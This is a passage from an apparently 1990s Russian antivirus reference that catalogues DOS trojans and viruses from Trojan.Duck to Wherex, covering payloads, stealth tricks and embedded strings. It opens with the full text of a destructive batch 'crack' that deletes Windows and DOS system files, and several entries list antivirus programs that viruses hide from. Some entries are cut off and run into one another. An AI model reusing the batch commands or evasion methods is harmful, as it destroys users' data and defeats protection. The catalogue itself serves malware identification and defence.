UZ 0UR fREE 20ftWARE.....
:: © 1994 BBS PhUCkERZ C1Ub ::

Trojan.Duck

Данный троянец получен с помощью программы BAT2COM из пакетного файла следующего содержания:
---------------------------
Da Ultimate Crack
by Plucky Duck &
Da AC-DC Boy
---------------------------
Cracking...
Done...
DEL c:\windows\win.ini
DEL c:\windows\system.ini
ATTRIB -r -a -s -h c:\command.com
DEL c:\command.com
ATTRIB -r -a -s -h c:\windows\user.dat
DEL c:\windows\user.dat
ATTRIB -r -a -s -h c:\windows\user.da0
DEL c:\windows\user.da0
ATTRIB -r -a -s -h c:\windows\system.dat
DEL c:\windows\system.dat
ATTRIB -r -a -s -h c:\windows\system.da0
DEL c:\windows\system.da0
ATTRIB -r -a -s -h c:\io.sys
DEL c:\io.sys

Trojan.GetIt

Данная программа предназначена для воровства паролей для Novell NetWare. Троянский код записывается по вирусному принципу к любой COM- программе. При старте такой программы, данный "троянец" устанавливает свою копию резидентно в память "на INT 21h", ждет старта программы LOGIN, после чего записывает вводимый пользователем пароль в указанный в теле "троянца" файл.

Trojan.Himan

Производит поиск в среде окружения (environment) программы указателя "MAXIMUS=". Далее в указанном каталоге ищет файл MAX.OVL и модифицирует в нем по определенным смещениям 2 байта. Содержит текст "-=HiMAN=-".

Trojan.TimeBomb

Троянская программа TimeBomb записывает в MBR жесткого диска деструктивный код, который уничтожает содержимое всего жесткого диска в определенный, указанный пользователем день. При записи в MBR "троянца" содержимое оригинального загрузчика сохраняется в файле MBR.BAK.

Trojan.Xmas

На фоне поздравления с Рождеством переименовывает файлы C:\IO.SYS и C:\MSDOS.SYS в C:\*.SIS, а файлы C:\WINDOWS\SYSTEM.INI, C:\WINDOWS\WIN.INI в C:\WINDOWS\*.INY. После чего удаляет себя.

Trooper.2259

Резидентный стелс-вирус. Содержит текстовые строки "3О4О5О6О7О8Оd", "TROOPER V1.0 Hungary-7500", "EXECOMCLIPPERCOMSPEC=", "BEFKNOW".

Trout.6804

Опасный резидентный полиморфный вирус. Первым делом вирус пытается найти файлы по маскам C:*.COM, C:\DOS\KEYB.COM, C:\DOS\*.COM, *.COM и заразить 5 файлов. Удаляет файлы CHKLIST.MS,CHKLIST.CPS,ANTI-VIR.DAT, \SCANCRC.CRC,\_CHK.CHK,\NAV_._NO.Вирус скрывается в памяти от следующих программ:
SCAN.NETSCAN.CLEAN.VSHIELD.F-PROT.VSAFE.MSAV.CPAV.NAV.TBAV.TBSCAN.
VDS.NOVI.AVP.-V.-VPRO.VIREX.AVSCAN.VI-SPY.GUARD.FINDVIRU.TNT.TNTAV.
HTSCAN.NEMESIS.NOD.ITAV.VI.VIRIT.IM.WIN.TD.DEBUG.
При старте любой из этих программ, вирус "отпускает" захваченный им INT 21h, шифрует свою резидентную копию с помощью полиморфного механизма, "перехватывает" INT 22h, устанавливая его на полиморфный расшифровщик, уничтожает свою незашифрованную копию в памяти и отдает управление DOS. После обратного получения управления "через" INT 22h, по окончании работы антивирусной программы, вирус расшифровывает свой код и снова "перехватывает" INT 21h. Вирус содержит текст:
This is "The Second NewBorn Trout" virus
Programmed in the city of Milan, North Italy
[C] The Tricky Trout 1995
Mutation Engine: TT-PEB (Tricky Trout Plurimorphic Encryptor Builder)
version 2.01 (TPE standard)

Trurl.846

Содержит строки "Bengal Tiger, v3p0x ## By Trurl, the great constructor, 1993## Buenos Aires, Argentina" и "Trurl".

Trust.687

Неопасный резидентный вирус. Устанавливает свою копию в область видеопамяти BB00:0000 и "перехватывает" INT 10h, 21h. При смене видеорежима (f.0 Int 10h) вирус "освобождает" "захваченные" им прерывания. Иногда выводит текст:
Принцип взаимного довереия выше взаимных обязательств.
С. Мавроди.

Truxested.based - вирусы

Данные вирусы сконструированы, видимо, для "демонстрации" видеоэффектов различных вирусов.
Содержит тексты:
Hullo ! Welcome to 2UP virus. Don`t try so hard!
Hallo Mr.Virusolog,now you decod me !It's about fucking time.
What do you think about 2UP Virus ?
This Virus Was Designed in 1992-1994 .It Dedicated For Nobody..
I Want To BreakFree ! Right Now
2UP©1994
AID COMMAND ANTI AV HOOK SOS TSAFE -V SCAN NC VC TNT ADINF
Вирус не заражает программы, содержащие в своем имени сочетания букв из последней строки.

Tsh.Banana.2413

Неопасный резидентный шифрованный стелс-вирус. Иногда (видимо, при копировании кода резидентного вируса из памяти в файл) может вывести на экран или записать в файл текст:
±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±
ЙНННННННННННННННННННННННННННННННН»±
є © 1994 Trash Soft & HardWare є±
ИННННННННННННННННННННННННННННННННј
Содержит тексты:
Dig here!
Sometimes the banana is just a banana
ЙНННННННННННННННННННННННННННННННННН»
є The people are still having sex, є
є and nothing seems to stop them...є
ИННННННННННННННННННННННННННННННННННј
Don't try to fuck me , Hacker!
Somebody in this world is having sex right now...
Designed in Tver. 1993-94
It's dedicated to all guys from Tver Politechnical Institute,
especially EVM-24, ATP-25, ASU-21...
Release date: 23-May-1994

Tubo

Неопасный загрузочный вирус. Иногда расшифровывает и выводит на экран текст "ШstanbulCCC was here. He He". Свое название получил за то, что в выводимой на экран строке в ее зашифрованном состоянии присутствует текст "tubo".

Tumot.432

Неопасный резидентный вирус. При старте программ, имеющих в своем имени буквосочетания "WEB." или "AIDS" вирус обезвреживает свою резидентную копию в памяти, а затем снова ее активизирует.

Tune.544

Неопасный резидентный вирус. При нажатии на Ctrl-Alt-Del вирус издает некие музыкальные звуки и возвращает управление в DOS.

Tune.663

Неопасный резидентный вирус. После запуска 33 программ сдвигает изображение на экране вниз и влево.

Turn.557, Turn.571

Неопасные резидентные вирусы. 31 числа изменяют на зеркальные (перевернутые) изображения букв латинского алфавита от 'A' до 'Z', по одной букве после каждого запущенного на исполнение COM-файла.

Turner.3276

Опасный резидентный полиморфный вирус. Располагает свою резидентную копию в области памяти EMS, и только 215 байт располагаются в верхних адресах памяти. Эти 215 байт производят анализ вызываемых функций INT 21h и производят передачу управления основному вирусному коду. В январе вирус уничтожает содержимое CMOS-памяти, выводит сообщение:
The Turner Virus Version 3.56
This virus was written in Voronezh in July of 1993
Modified and enhanced with mutant engine & high implantation
In July-November of 1995 by RingWraith
TRY TO CATCH ME IF U RELY K00L!
CMOS ...perverted
MBR ...perverted
Whole disk ...wait...
после чего уничтожает содержимое секторов первого жесткого диска. Содержит тексты "EMMXXXX0", "=YooHoo=", "SHUTEND".

TV.730

Опасный резидентный вирус. Периодически стирает сектора диска C:. Содержит строку "TV".

Twofs

Опасный загрузочный вирус. После 256 загрузок с жесткого диска уничтожает содержимое 102 первых секторов первого жесткого диска.

TyGde.3072

Опасный резидентный зашифрованный вирус. При нахождении на экране строки "au! ty gde" вирус открывает устройство COM2 на запись (как файл функцией f.3Dh Int 21h), переопределяет его также на чтение и запускает командный процессор. Данные манипуляции необходимы, видимо, взломщику для "вскрытия" станций FIDO.

0

21

U

Uddy.2617

Очень опасные резидентные вирусы. Уничтожают содержимое секторов диска, записывая в них строку "UDDY UDDY UDDY...", выводят эту строку на экран и перезагружают компьютер.

UFO.1468

Опасный резидентный шифрованный вирус. "Перехватывает" INT 9,21h. После 3000 нажатий на клавиши вирус выводит один из текстов:
THEY... are here !
We will see who is gonna survive, motherfuckers !
You are all some fuckin Unknown Flying Objects !
UFO has come to destroy the fucking thresh around here !
После 30000 нажатий на клавиши вирус выводит текст "I am sick of a bullshit like" и уничтожает содержимое CMOS-памяти. Имеет текст "UFO".

Ukraine.3201 (1-3), 3215, 3300, 3404, 3537, 3627, 3633

Очень опасные резидентные полиморфные вирусы. Ukraine.3537, 3627, 3633 используют в полиморфном расшифровщике перехват INT 1Ch (таймер). 24 числа месяца выводят текст:
24 СЕРПНЯ - ДЕНЬ НЕЗАЛЕЖНОСТI УКРАIНИ !!! Играют гимн Украины и уничтожают первый жесткий диск. Ukraine.3537,3627 пытаются уничтожить таблицы ADinf на всех доступных дисках.

UNashamed (1,2)

Неопасные загрузочные вирусы. После 10:00 и заражения 2 дисков могут вывести на экран текст "the UNashamed Naked!" и "повесить" систему.

Unbidden.507

Неопасный нерезидентный вирус. Имеет текст "<1996Nov3\Fryazino\Mikhail G.\Unbidden v1.00>".

UnGame.645

После 4095 нажатий на клавиши переводит монитор в текстовый режим.

UnGame.823

Неопасный резидентный вирус. При установке графического режима #13h 320x200 "перегружает" систему.

Union.1449, 1531

Неопасные зашифрованные нерезидентные вирусы. Иногда выводят в графическом видеорежиме два флага: украинский желто-синий и российский бело-сине-красный и текст "УКРАИНА И РОССИЯ ПОРОДНИЛИСЬ НАВСЕГДА !!!". Содержат тексты "UNION 2.0" (или "UNION 2.5" - Union.1531) и "*.exe AIADSCNCPATH".

Urod.662, 773

Очень опасные нерезидентные вирусы. Оставляют в видеопамяти резидентный код, который удаляет все открываемые файлы и выводит текст:
Urod.662 - Губатый лаборант-урод
Urod.773 - С новым годом !!!

Urphin.1621

Неопасный резидентный вирус. По возможности, устанавливает свою резидентную копию в область UMB. При старте программы TPC*.* вирус во всех открываемых файлах *.PAS пытается найти строку "BEGIN" или "begin". Если данная строка найдена, то вирус сразу же за этой строкой записывает текст "ASM", директиву "DB" и конвертирует собственный код в ассемблерные инструкции в виде байт данных. Заканчиваются вирусные данные строкой "END;". Далее вирус записывает продолжение *.PAS-файла. В конец данного *.PAS-файла вирус записывает строку-идентификатор "{URPHIN0acsina.634 Опасный резидентный вирус. 21 мая уничтожает содержимое загрузочного сектора текущего диска, записывая в него "Happy birthday to Andrew !".

0

22

V

Vacsina.1206, 1212, 1269, 1339

Неопасные резидентные вирусы. Vacsina.1206, 1212 издают звуковой сигнал при заражении файла. Vacsina.1269 иногда выводит на экран текст "Az sum vasta lelja.". Содержат строку "VACSINA".

Vandal.1895

Неопасный резидентный шифрованный вирус. Если значение минут системного времени равно 20, то вирус выводит на экран текст:
Вас приветствует:
очень опасный полиморфный файлово-загрузочный
стелс-вирус: Вандал. 1996г. г.Волгоград.
Етот вирус написан великорусским вирусописателем
пока не очень извесным под кличкой Dark Vandal!!!

Vanitas.2040, 3712

Опасные резидентные зашифрованные вирусы. Пытаются заразить файлы C:\WINDOWS\COMMAND.COM и C:\COMMAND.COM. 27 марта проявляются каким-то видеоэффектом. Содержат тексты:
Vanitas.2040:
VANITAS++ v1.1 ©GR97 by ANAX.Member of .
Everyone is Original. [E-75]Chill-Out.
Vanitas.3712:
VANITAS++ v2.0 GR©97 by ANAX. [E-75] goes to Hell.
Have a nice death...

Varna.1536

Опасный файлово-загрузочный вирус. 8 числа месяца уничтожает содержимое первого жесткого диска. "Перехватывает" INT 13h и 21h. При чтении заголовка EXE-файлов (28 байт) заражает данные файлы.

VarWorm.913

Неопасный резидентный зашифрованный вирус. При заражении файлов записывает перед собой до 64K случайных байт. Содержит текст "Worm!".

VBasic

Пытается заразить *.COM и *.EXE-файлы на всех дисках. Иногда выводит сообщение "Access denied." и возвращает управление DOS. Содержит строку "*.EXE BASRUN BRUN *.COM IBMBIO.COM IBMDOS.COM COMMAND.COM *.*".

VCC.based - вирусы

Данные вирусы сконструированы с помощью вирусного конструктора VCC. Вирусы, созданные с помощью VCC-конструктора заражают COM-файлы. Содержат текст "[IE-VCC v0.19с]".

VCL.466

Неопасный нерезидентный вирус-спутник. Иногда издает "щелкающие" звуки. Содержит текст "[VCL]".

VCL.662

Опасный нерезидентный вирус. Содержит тексты:
- Это Рожа Лозинского,Понявшего,Что aidstest-г08но
- А Вот Мостового Еще Не Пpохватило...
CHLEN To Danilov's Laboratory !

VCL.Mom.974

Опасный нерезидентный вирус. В апреле после 7 числа уничтожает содержимое логических разделов жесткого диска, после чего выводит сообщение:
You are hereby notified that your system has just encountered
a very unusuall disk error. This error can be very fatal!!!
Please check your system for any further errors.
DOS EXCEPTION ERROR #13
Содержит строку "MoM#\/# ( ) #\/#".

VCL.Timothy

Неопасный нерезидентный вирус-спутник. 17 января или по понедельникам выводит сообщение:
Timothy Leary's dead!
No..hey's outside looking in...
Также содержит текст "[VCL] TIMOTHY LEARY WANTS TO TALK410-721-9580. TIMMY TEACH THEYOUNG THEY NEED GUIDANCE-GRAViTY'S RAiNBOW".

VCode.2540

Очень опасный нерезидентный вирус. В декабре пытается уничтожить информацию на всех доступных логических устройствах жесткого диска. Содержит зашифрованные текстовые строки "COMMAND.COM", "X:\CONFIG.SYS".

VComm.637

Неопасный нерезидентный вирус. Производит поиск и заражение *.EXE-файлов в текущем директории. При заражении вирус увеличивает размер файла до величины кратной 512 байт, после чего приписывает свой код. Вирус увеличивает количество перемещаемых элементов EXE -файла на 1. Вирус оставляет в сегменте BFFE:0000h резидентную программу на INT 13h, запрещающую запись на диск.

VCS.based - вирусы

Данные вирусы сконструированы с помощью вирусного конструктора Virus Construction Set. Заражают COM-файлы. Опасны. Уничтожают содержимое файлов C:\AUTOEXEC.BAT и C:\CONFIG.SYS.

Vengeance.723

Очень опасный вирус. 20 числа любого месяца выводит сообщение "*** Vengeance is ours! ***", после чего пытается уничтожить отформатировать два жестких диска. Содержит также строку "SKISM/Phalcon '92".

Verify

Опасный загрузочный вирус. 25 числа при записи на диск (f.03 Int 13h) изменяет значение регистра AH на значение 04 (verify).

Veronika

Неопасный boot-вирус. После заражения 15 дисков выводит такой же текст, как и вирус Veronika.1549, после чего "завешивает" систему.

Veronika.1549

Опасный резидентный зашифрованный вирус. При 128 обращениях к гибким дискам (f.0Eh INT 21h) записывает в Boot-сектор флоппи-диска код, производящий, при загрузке с данной дискеты.
Содержит также строки "Veronika" и "Veronika P.".

Verwolf.3502

Неопасный нерезидентный вирус. Оставляет в памяти, по адресу 0040:0054h резидентный код, способный "завесить" систему при старте некоторых программ. Содержит текст "My name is VERWOLF1 !".

Vet.1377

Неопасный резидентный вирус. Заражает COM и EXE-файлы, переводя их в формат EXE-файла. Причем EXE-файлы заражает по нестандартной схеме: записывает в начало файла свой код, со своим EXE-заголовком, потом записывает программный код файла-жертвы, после которого записывает таблицу перемещаемых символов (relocation table). Таким образом, при лечении таких EXE-файлов, их восстановление в оригинальное состояние, практически, не предоставляется возможным. Но восстановленный EXE-файл, в большинстве случаев, должен оказаться работоспособным. При старте программы, содержащей в своем имени словосочетание "fico", вирус читает 10 первых секторов жесткого диска в память, в область параметров загрузки данной программы (ES:BX) и выводит текст "Жадность погубит компанию Фико !". Содержит текстовую строку "VET!".

VICE - вирусы

VICE (Virogen's Irregular Code Engine) - полиморфный генератор вирусных шифровщиков и расшифровщиков. Существуют несколько версий генератора. Они содержат текстовые строки:
[VICE v0.1с, by ыirogen]
{VICE v0.2с, by ыirogen [NuKE]}
{ViCE v0.3с, by ыirogen [NuKE]}
[ыiCE v0.5, by ыirogen]

VICE.Code

Очень опасный резидентный полиморфный вирус. Удаляет файлы, упакованные архиваторами ARJ и ZIP, а также файлы, начинающиеся на -V, MS, CP. Не заражает файлы, имена которых оканчиваются на ND, AN, AV, OF, NU. Содержит текст "CodeJournal by ыirogen [NuKE]".

VICE.One13th

Опасный резидентный полиморфный вирус. Уничтожает файлы ANTI-VIR.DAT, CHKLIST.MS, CHKLIST.CPS, а также некоторые файлы антивирусной системы InVircible. Имеет строку "One/Thirteenth, coded by ыirogen [NuKE]".

Victim.600

В четверг прибавляет к значению системного времени 100 лет. Содержит текст "Victim of Galeocerdo cuvieri".

Vienna.based - вирусы

Данные вирусы написаны на базе исходных текстов первого знаменитого вируса Vienna.648.

Vienna.776

Иногда выводит текст:
Я, кажется, подхватила какую-то заразу...
Срочно звоните Дмитрию Николаевичу Лозинскому
по телефону 292-40-76 (Москва) и приобретите
ПРОГРАММУ AIDSTEST !!!

Vienna.1239

Пытается уничтожить 3 первых сектора цилиндра 0 головки 1 первого жесткого диска.

Viking.59

В настоящее время данный вирус является мировым рекордсменом среди самых маленьких резидентных файловых вирусов, сохраняющих работоспособность инфицированных программ. Является усовершенствованной модификацией вирусов Dinky, но с использованием пары неплохих приемов.

Viking.Mixtura

Неопасный резидентный вирус. Не заражает файлы, начинающиеся на -V, AI, AD, M. Содержит текст "Crypted Here->", после которого, видимо, идет зашифрованный текст, а также:
ViKing-Mixtura,CopyLeft (L) 1993 by ViKing.
ViKing is The Real King of Viruses' Kingdom.

Vinchuca.925

Очень опасный резидентный шифрованный вирус. 3 июля пытается уничтожить содержимое 17 секторов 4 головок на всех дорожках жесткого диска. 3 числа любого месяца выводит на экран текст:
ЙНННННННННННННННННННННННННННННННННННННННН»
є Virus ViNCHuCa V1.0 1993. є
є Creado por MURDOCK. є
є Buenos Aires ,Argentina. є
є є
є Su PC tiene Mal de Chagas....jajaja... є
ИННННННННННННННННННННННННННННННННННННННННј
Содержит также строку "Saludos para SaTaNiC BRaiN y Patoruzu".

Vinnitsa.1046

Опасный нерезидентный вирус. Разрушает DBF-файлы, записывая в них первым байтом - байт 6.

Vinnitsa.1207

Очень опасный резидентный вирус. Иногда записывает информацию из видеобуфера в случайные сектора диска методом длинной записи (f.0Bh INT 13h). После такой записи данные сектора обычным способом (f.02 INT 13h) прочитать не удастся. Вирус перехватывает INT 10h, 16h, 21h. Вирус замедляет вывод на экран через INT 10h. Устраивает некоторые "шутки" с клавиатурой. Содержит текст "Vinnitsa ©1994 by Eddie Murphy".

Vinnitsa.1620, 1658

Очень опасные резидентные зашифрованные вирусы. Иногда уничтожают информацию в случайных секторах диска, разрушают DBF-файлы, записывают случайные числа в случайные порты. Содержат текст "Vinnitsa 1992 year Hacker all country, united!!!".

VirCheck.2161, 2170

Неопасные резидентные шифрованные вирусы.В четверг 12-го выводят текст:
ХНННННННННННН VirCheck V1.2 ©1991 НННННННННННё
і Be aware of those worms out there, violating і
і your machine on Friday 13th - it's tomorrow! і
і і
і Special thanks to Ross M. Greenberg, і
і Patricia M. Hoffmann and John McAfee і
ФНННННННН Press any key to continue... ННННННННѕ

Virogen.ASeXual

Опасный полиморфный вирус. Заражает COM-файлы стандартным способом, записывая свой код в конец файла, а EXE-файлы заражает, как вирус-спутник, создавая файл с расширением COM, но с таким же именем, как и у EXE-файла. Удаляет файлы CHKLIST.* ANTI-VIR.*. 2 числа каждого месяца выводит на экран текст:
ASeXual Virus V0.99 - Your computer has been artificially Phucked!
Содержит текст "©1993 - Virogen".

Virogen.BombTrack

Опасный резидентный полиморфный вирус. Удаляет файлы CHKLIST.MS и CHKLIST.CPS. Может удалить все файлы в текущем директории и создать директории NEVERэne. и BOMBTRA.CK. Содержит строку "BOMBTRACK v1.00 - Coded by NEVERэne (BELGiUM)".

Virogen.Offspring.1130

Неопасный полиморфный вирус. Для EXE-файлов - вирус-спутник. 9 числа выводит текст "OFFSPRING V0.81", после чего начинает издавать звуковой сигнал и мигать лампочками на клавиатуре. Содержит также еще одну строку "©1993 negoriV".

Virogen.Offspring.1294

Полиморфный неопасный вирус. 14 числа выводит на экран текст:
©1993 negoriV
* Thank you for providing me and my offspring with a safe place to live *
* Offspring I v0.07. *

Virogen.Offspring.1555

Опасный резидентный полиморфный вирус. Для EXE-файлов - вирус-спутник. Удаляет файлы CHKLIST.*, ANTI-VIR.DAT. По 9 числам месяца выводит текст "OЯЯspring Virus V0.89". Содержит текст "GA© ыirogen".

Virogen.PinWorm

Опасный резидентный полиморфный вирус. Удаляет файлы CHKLIST.CPS и CHKLIST.MS. 1 числа любого месяца создает директории PIяWщrM.ыg!, а в нем создает 13 файлов:
I hope y
ou have
enjoyed
your inf
estation
by the
mighty P
inworm p
arasiteъ
ъъъъъъъъ
Fuck you
all!
-ыirogen
Содержит строку "PIяWщrMяv1.00 - Coded by ыirogen in April 1994".

Viros.429

Неопасный резидентный вирус. Размещает свою резидентную копию по адресу 6800:0000. Выводит сообщение:
ЪДДДДДДДДДДДДДї
і VIROs v1.1 і
АДДДДДДДДДДДДДЩ

Virus90.857, Virus101.2560

Нерезидентные вирусы. Virus101.2560 - шифрованный, опасный вирус. Выводят на экран сообщения:
Virus90.857 - Infected!
Virus101.2560 - This file has been safely infected by
VIRUS101 - the safe, educational virus utility.
This copy furnished to John McAfee.
Virus90.857 периодически сдвигает символы на экране и "перегружает" систему. Virus101.2560 в загрузочных секторах дисков производит замену текстовой строки "Non system disk or disk error!" на вышеприведенный текст.

VirusConstructor.based - вирусы

Данные вирусы сконструированы с помощью вирусных конструкторов IVP, PS-MPC, G2 или VCL. Вирусные конструкторы - это программы, способные создавать исходные тексты, объектные и исполняемые вирусные модули. Существует возможность задания различных вариантов и типов вирусов в файлах конфигурации конструкторов или непосредственно из меню программы (VCL). Вирусные конструкторы позволяют создавать резидентные или нерезидентные вирусы, заражающие COM, EXE, или COM/EXE-файлы, шифрованные или нешифрованные, замещающие программный код (overwriting) или вирусы-спутники (companion). А также позволяют задавать наличие в вирусах всевозможных текстовых строк, видеоэффектов и деструктивных функций.

Viv.513, Viv.524<.i>, Viv.771

Содержат в своем теле слово "VIV". Viv.771 после 4097 вызовов INT 21h затирает таблицу прерываний нулями.

Vlad.Antipode

Неопасный резидентный шифрованный вирус. Содержит текстовую строку "TBSCAN.EXE[Antipode 1.0] by Automag/VLAD".

Vlad.Daddy

Опасный резидентный вирус. Удаляет файлы ANTI-VIR.DAT, MSAV.CHK, CHKLIST.CPS, CHKLIST.MS. Содержит текст "[Incest Daddy] by Qark/VLAD".

Vlad.Hemlock

Неопасный резидентный файлово-загрузочный полиморфный стелс-вирус. Заражает MBR жесткого диска, Boot-сектора флоппи-дисков, COM, EXE и SYS-файлы. Перехватывает INT 09, 13h, 21h. "Переживает" перезагрузку системы при нажатии на Ctrl-Alt-Del. При старте программы TBSCAN вирус подставляет в командную строку программы ' co nm'0Dh. При старте программы WIN в командную строку подставляются значения ' /d:f',0Dh (16-битовый доступ к диску). При старте программ CHKDSK, PKZIP, ARJ, NDD, SCANDISK, LHA вирус "выключает" свой стелс-режим. При загрузке с инфицированного MBR вирус перехватывает INT 09, 13h, копирует таблицу векторов прерываний в свой буфер, и затем пытается определить в памяти наличие драйвера DOSDATA.SYS из комплекта QEMM. Если данный драйвер будет найден, то вирус пытается определить запуск файла AUTOEXEC.BAT или любой EXE-программы, после чего перехватывает INT 21h. Если же драйвер DOSDATA.SYS не найден вирусом, то перехват INT 21h осуществляется после чтения 10 заголовков EXE-файлов через INT 13h. При нажатии на Ctrl-Alt-Del вирус определяет тип процессора, а также для процессоров 286+ нахождение их в защищенном режиме. Если процессор 286+ работает в защищенном режиме, то перезагрузка системы игнорируется. В противном случае, а также для процессоров ниже 286 - в область таблицы векторов прерываний копируется старая таблица из буфера вируса, после чего производится вызов INT 19h. Вирус содержит текст "Hemlock by [qark/VLAD]".

Vlad.Mummy

Неопасный резидентный шифрованный вирус-спутник. Содержит текст "[Mummy Incest] by VLAD of Brisbane. Breed baby breed!".

Vlad.Lapis

Неопасный резидентный вирус. Внедряет 445 байт своего кода в область стартовых байт EXE-программы, перенеся их в конец файла. Содержит текст "[Lapis-Lazuli], Rhince/VLAD".

Vlad.Sister

Неопасный резидентный шифрованный вирус. Содержит текст "[Incest Sister] by VLAD - Brisbane, OZ".

Vodka.551, 560

Неопасные (Vodka.551 - опасен) резидентные вирусы. В мае Vodka.551 записывает в начало запускаемых COM-файлов код, который выводит текст:
COM_ДИБИ центр г.ХАРЬКОВ
тел 03
Vodka.560 может вывести на экран текст "Пиво,Водку пить - здоровью вредить!? (Y/N)" и ожидать нажатия на клавиши "Y" или "N". Содержит текст "(copyleft) ДИБИЛИЗАТОР ver. 1.2".

Voronezh.650

Иногда выводит на экран сообщение "Video mode 80x25 not supported". Имеет также строку "16.01.91, v1.00, Химик & Слон".

Voronezh.1536 (1-3)

Опасные резидентные вирусы. При печати на принтере иногда изменяют некоторые слова на нецензурные.

Vpk.1430

Опасный резидентный вирус. "Перехватывает" INT 10h, 21h, 4Ah. Устанавливает 2 резидентные копии: одну в область видеопамяти по адресу B800:0FA0h "на" INT 10h и 21h,другую - в верхние адреса памяти "на" INT 4Ah. Периодически копирует код из второй копии в видеопамять. Иногда при выводе на экран заменяет русские буквы на латинские. Может записать в MBR первого жесткого диска троянский код, который после нескольких перезагрузок "завешивает" систему. Может вывести текст "<< Russian killer! >>". Также содержит текст "Привет Лозинскому от ВПК !".

VS.2790

Неопасный резидентный стелс-вирус. Если в течение 6 минут не было нажатий на клавиши, вирус исполняет гимн СССР. Содержит текст:
VS-061-"STEALTHIE". © 1993, ViruSystems inc.
VS

VS.3900, 4000

Неопасные резидентные полиморфные стелс-вирусы. При отсутствии ввода с клавиатуры в течение 15 минут выводят одну из 4 мелодий. Содержат тексты:
VS.3900 -
VS-071-"GHOST". © 1993, ViruSystems inc.
High performance music mutant virus, enhanced version 7.1.
Shareware.
***MAKERS OF VIRUSES OF THE WORLD, UNITE !!!***VS
VS.4000 -
VS-072-"GHOST". © 1993, ViruSystems inc.
High performance mutant virus, enhanced version 7.2.
Special thanks to E.Kaspersky!
*** MAKERS OF VIRUSES OF THE WORLD, UNITE!!! ***VS

0

23

W

Walker.3846

Неопасный резидентный вирус. Перехватывает INT 16h, 21h. Периодически выводит на экран в текстовом режиме симпатичного шагающего человечка. Также вирус содержит строку "WALKER V1.00 - This absolutely harmless and selfdestructive program is written by UJHPTTLZ in the city of Istanbul, 1992".

Wally.1029

Очень опасный нерезидентный вирус. Может уничтожить содержимое первого жесткого диска и вывести текст "Virus Wally versao programa.Tente me encontrar.".

Waria.479

Неопасный нерезидентный вирус. Иногда пытается вывести на экран текст "byWARIA!v1.0", но у вируса это не получается.

Warlock.666

Неопасный нерезидентный шифрованный вирус. Заражает файлы после 15.00. Содержит строку "WARLOCK".

Warlock.732

Опасный резидентный вирус. Иногда игнорирует запись или форматирование некоторых секторов, выводя на экран в этот момент что-то похожее на помехи. Содержит текстовую строку "WarLock".

Warlock.1672, 1802, 1817

Опасные резидентные вирусы. В файлы, содержащие в начале байт со значением 3 (DBF-файлы) или 0 (Warlock.1672), записывают 32 байта C3h или 0. Warlock.1672 содержит текст "WARLOCK", а Warlock.1817 - "Revenge of WARLOCK!".

Warlock.2879

Очень опасный резидентный вирус. Уничтожает файлы, содержащие байт 3 в начале (DBF-файлы), а также все файлы, кроме EXE, после 30 заражений, записывая в их начало 32 байта. Содержит текст "WARLOCK".

Warrior.1024

Опасный нерезидентный вирус. Устанавливает в верхние адреса памяти свою резидентную копию и "перехватывает" INT 21h. При вызове функции записи в файл (f.40h Int 21h) резидентная копия вируса устанавливает адрес буфера записи на свой текст:
... and justice for all! (US constitution)
Dream Over ... ть резидентный код "на INT 8", который "трясет" экран. В начале
содержит текст "W.A.S.P.".

Wasp.1655

Опасный резидентный вирус. 3 числа пытается форматировать нулевую дорожку первого жесткого диска. В 20:00 выводит на экран текст:
ЪДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДї
і Hello - Im Your New Virus і
і - WASP - і
і A.J.Poshukaev Call Neighbour і
АДДДДДДДДДДДДДДДДДДДДДДДДДДДДДДЩ
Содержит также строку: "Wasp"ver 1.0 - Underground Laboratory "FLY" - Moscow 1993

Watshira.2048 (1-3)

Неопасные резидентные вирусы, Watshira.2048 (3) - опасный вирус; 28 декабря он периодически зашифровывает и расшифровывает MBR жесткого диска. Watshira.2048 (1,2) содержат текстовую строку:
Producted by Mr.Watshira Sae-eu KMIT-NB Date 12/28/1990 BIOS
Watshira.2048 (3) содержит текст:
We are PRO Version 1.0 Producted by Mr.Watshira Sae-eu KMIT-NB Date Dec
28,1990 See U Next Version. BIOS SOIB

WeekDay.1614

Неопасный резидентный вирус. В качестве признака заражения файла устанавливает удвоенное значение дня недели создания файла в поле секунд.

Weirdo.555

Неопасный резидентный вирус-спутник. Копирует свой код в область EMS, оставляет в обычной памяти небольшой резидентный код "на INT 21h". При старте EXE-файла вирус копирует свой код из EMS в обычную память и создает COM-файл (вирус-спутник) с именем EXE-файла. Если при запуске оригинального EXE-файла, не хватает свободной памяти. то вирус выводит сообщение "Out of memory". Если же EXE-файл обнаружить не удалось, то вирус удаляет COM-файл, из которого он стартовал. Содержит строку "[Weirdo © 93 CC/TridenT]EMMXXXX0".

WereWolf.Beast.1192, 1208, WereWolf.FullMoon.1361, 1367, WereWolf.Scream.1152, 1158, 1168, WereWolf.Wulf (1,2), WereWolf.Howl.2662, 2845

Очень опасные резидентные вирусы. WereWolf.FullMoon,WereWolf.Wulf(1,2)- зашифрованы, WereWolf.Howl.2662, 2845 - полиморфные. Периодически уничтожают случайные сектора первых двух жестких дисков. Не заражают файлы, содержащие в своем имени следующие последовательности букв: CLEAN,AVP,TB, V,SCAN,NAV,IBM,FINDV,GUARD,FV,CHKDSK,F-. Содержат тексты:
WereWolf.Beast.1192,1208 - BEAST ©1995 WereWolf
WereWolf.Howl.2662,2845 - [HOWL]ease wait...
Data recovery
All data have been succesfully DELETED!
Thanks for your assistance.
Press to continue.
Wg.3822 заражает SYS-файлы, указанные через переменные DEVICE или DEVICEHIGH в файле C:\CONFIG.SYS. Резидентная копия Wg.3822 устанавливается в память только из инфицированных SYS-файлов. После чего эта резидентная копия может заражать EXE-файлы. Wg.3822 удаляет таблицы ревизора диска ADinf. Wg.3822 содержит текст "WG04m Copyright © 1995-1997 by WoodGoblin".

Whale.9216

Неопасный резидентный шифрованный стелс-вирус. Создает файл C:\FISH-#9.TBL, в который записывается содержимое MBR первого жесткого диска и текст "FISH VIRUS #9 A Whale is no Fish! Mind her Mutant Fish and the hidden Fish Eggs for they are damaging. The sixth Fish mutates only if Whale is in her Cave". В период с 19 февраля по 20 марта "завешивает" систему и выводит текст:
THE WHALE IN SEARCH OF THE 8 FISH I AM '~knzyvo}' IN HAMBURG

Wherex.1688

Опасный резидентный вирус. В понедельник в 3:30 пытается вывести на экран текст:
GOLDEN FLOWERS!
VEGERATABLES!
